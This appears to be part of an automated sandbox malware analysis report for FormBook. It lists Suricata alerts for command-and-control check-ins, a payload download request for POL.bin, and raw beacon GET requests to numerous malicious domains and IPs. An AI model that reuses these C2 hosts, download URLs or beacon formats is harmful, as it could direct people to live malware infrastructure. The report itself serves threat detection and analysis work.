        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49801 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49765 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49793 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49793 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49777 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49777 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49805 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49805 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49769 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49838 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49838 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49809 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49809 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49818 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49813 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49813 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49830 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49850 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49850 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49822 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49834 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49834 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49842 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49842 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49826 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49826 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49846 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49846 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49835 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49831 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 13.248.169.48:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.ngmr.xyz
        Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
        Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49755 -> 185.86.211.137:80
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /POL.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: bestpack.eeConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /POL.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: bestpack.eeCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.inastra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /d84b/?Xb3xI=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dhkatp.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tempatmudisini01.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.inastra.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
